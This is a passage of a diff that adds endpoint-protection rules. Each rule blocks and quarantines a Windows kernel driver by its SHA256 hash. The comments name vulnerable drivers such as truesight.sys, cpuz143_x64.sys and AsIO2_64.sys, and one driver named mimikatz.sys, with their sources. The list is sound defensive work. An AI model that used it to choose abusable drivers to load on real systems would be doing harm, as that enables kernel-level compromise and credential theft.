+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc6deb0e-4bc2-5165-9aae-6ae95c2b184d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155841Z",
+ "creation_date": "2026-03-23T11:45:31.155843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d2677a15c494668bf73dcc0849de41ee79e3b782d51ac04a2542a00933d09ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc705fbb-0953-514e-8f71-d3bcd4ddce67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610529Z",
+ "creation_date": "2026-03-23T11:45:29.610531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6befa481e8cca8084d9ec3a1925782cd3c28ef7a3e4384e034d48deaabb96b63",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc80852c-1cf6-571c-93f0-3b9fe3f8ae00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830669Z",
+ "creation_date": "2026-03-23T11:45:30.830672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd3fdc5c338e21e8d8fd9d586fabfdb9fec312f3852bb278fe87ef64d05f78d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc92cf50-8182-5dc8-a553-174219eeebef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462440Z",
+ "creation_date": "2026-03-23T11:45:30.462443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462452Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51141c22e37d651703dd57cfda018ff06a0175a78e7c72f8ad733a281721716a",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc92f795-d840-53fa-bc9d-821cbab77b7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621720Z",
+ "creation_date": "2026-03-23T11:45:29.621722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "923ebbe8111e73d5b8ecc2db10f8ea2629a3264c3a535d01c3c118a3b4c91782",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc96a0ad-c4e5-5ef4-9dec-6855d0425773",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480082Z",
+ "creation_date": "2026-03-23T11:45:30.480084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480089Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37022838c4327e2a5805e8479330d8ff6f8cd3495079905e867811906c98ea20",
+ "comment": "Vulnerable Kernel Driver (aka stdcdrv64sys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fca72425-70e1-5931-90ff-bc4ce2f3bcc9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475044Z",
+ "creation_date": "2026-03-23T11:45:30.475047Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475057Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3d9b90e2a1a6e997dd3e3ed6b05aa3230d8ca3c25477b847dbe163c0367cc7e",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcaf0b25-ff9b-5e21-97e3-a2cd820b7487",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148096Z",
+ "creation_date": "2026-03-23T11:45:31.148098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad25321c6d5d453f61877d4518ff9dd0f0f9c46b11f91743441dedb36075844c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcb41e68-7090-5703-a079-d66b45301a9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819571Z",
+ "creation_date": "2026-03-23T11:45:31.819574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccb06410b63db03f5b8f86a99dca017b8a6f4ac8917e3e7b628d7a7ade9f813c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcb70074-4888-59d1-96cc-738a6e94bfe4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479539Z",
+ "creation_date": "2026-03-23T11:45:31.479543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b66ad8c72063d4a3cc34aaa8cfee8dd7489880e2d369b1ed4ccc5cbea86c2bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcb84375-1445-52b9-a0de-0797e6164ca1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985082Z",
+ "creation_date": "2026-03-23T11:45:29.985084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985089Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcba455e-e89e-5077-bc0b-25f9a8ff3ec7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825669Z",
+ "creation_date": "2026-03-23T11:45:30.825671Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a87cbd4cdb3261b10539c2611d69ae66ee38eb83b2d6ffdfe832e348f8a543ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcbfa754-e04a-5333-b166-732dea479ae2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486263Z",
+ "creation_date": "2026-03-23T11:45:31.486267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb576807ce3385d1007d8d6aa6cd6c54c946eb78ec947d67cefe8fab58e99e26",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcca48bc-3cbd-5d7d-9b48-b4c82b84c248",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811435Z",
+ "creation_date": "2026-03-23T11:45:31.811437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72d17c16571c89cf3c7d1c48cf590e16704dc1758c4d6b9d3172cedae957e6fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fccfad40-c74b-531d-95c1-0a11cb615acd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621794Z",
+ "creation_date": "2026-03-23T11:45:29.621796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621801Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7bb08f99a9701482ce693d71e95559b10a247c4e8f50deba8097b0d3f191532",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcd23c3c-477b-5ef1-8309-05c5087575af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456752Z",
+ "creation_date": "2026-03-23T11:45:30.456755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456764Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "faa9aa7118ecf9bb6594281f6b582f1ced0cc62d5db09a2fbf9b7ce70c532285",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcdbc473-378e-539f-8bd4-3758805f1c44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159349Z",
+ "creation_date": "2026-03-23T11:45:31.159351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3739737765880d445f9a5b1dcfc6f5e8832e01738724f2c003b67226faf3823",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcdfd4fc-513f-5bbe-b465-1b84f78302cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815574Z",
+ "creation_date": "2026-03-23T11:45:30.815589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "903d6d71da64566b1d9c32d4fb1a1491e9f91006ad2281bb91d4f1ee9567ef7b",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fceb7018-587a-596f-a52c-e45e343d5424",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481097Z",
+ "creation_date": "2026-03-23T11:45:30.481099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481105Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf370bf2ef3fb6fd5e9722bad8af5347b74ce7252d291e2958b365aad1b0bb76",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcf105c6-9ca9-5e21-aa70-a52475b2dda0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808468Z",
+ "creation_date": "2026-03-23T11:45:31.808470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808476Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "002744572989f91fd5edf800ffc6baefeea877eca3b8d7c9abbfa5e29b1b3b5e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fcf64e10-0548-58e4-b36f-2e272fc54e6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160100Z",
+ "creation_date": "2026-03-23T11:45:31.160102Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80f793cd949b16335e835de748c5d15ca945c72c0cef50371ae80f931805b206",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd065efe-8ffc-5cc7-accc-40f56dce9e7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487236Z",
+ "creation_date": "2026-03-23T11:45:31.487238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3943991d2624914a5f8c16d7f4060601e4c09f1eae37e0dd13616e1ff53493a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd0b387f-056e-5f2c-beee-38eace13fd4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
